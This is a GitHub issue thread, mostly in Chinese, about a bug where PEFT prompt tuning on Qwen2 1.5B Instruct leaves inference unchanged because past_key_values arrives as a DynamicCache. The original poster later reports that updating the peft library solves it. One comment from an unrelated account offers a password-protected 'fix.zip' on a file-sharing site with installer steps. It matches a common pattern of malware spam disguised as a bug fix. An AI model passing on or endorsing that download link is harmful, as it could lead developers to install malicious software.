### ISSUE TITLE
对qwen2 1_5B  Instruct使用Peft库中的prompt tuning后，推理效果异常

### ISSUE THREAD

**Issue by jusrook** [QwenLM/Qwen2#882]
我之前对qwen1.5 1_8B chat使用同样的微调方法时，运行没有问题，但对qwen2 1_5B Instruct微调发现推理结果与微调之前完全一样，在debug后发现关键在于peft/peft_model.py的1698行的判断存在问题:
![图片1](https://github.com/user-attachments/assets/70b9dbc2-1f9a-435b-88ab-d837c51028c1)
在qwen1.5 中参数model_kwargs["past_key_values"]为None，而qwen2中该参数为DynamicCache():
![图片2](https://github.com/user-attachments/assets/6cefa25c-e9b6-4428-b5f5-369638abd005)
这导致在推理第一个token时，训练过的prompt embedding没有被添加进输入中，因而推理结果与微调前一样。
请问可以如何修改？

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jusrook** [comment]
发现更新到最新的peft仓库可解决此处的问题。
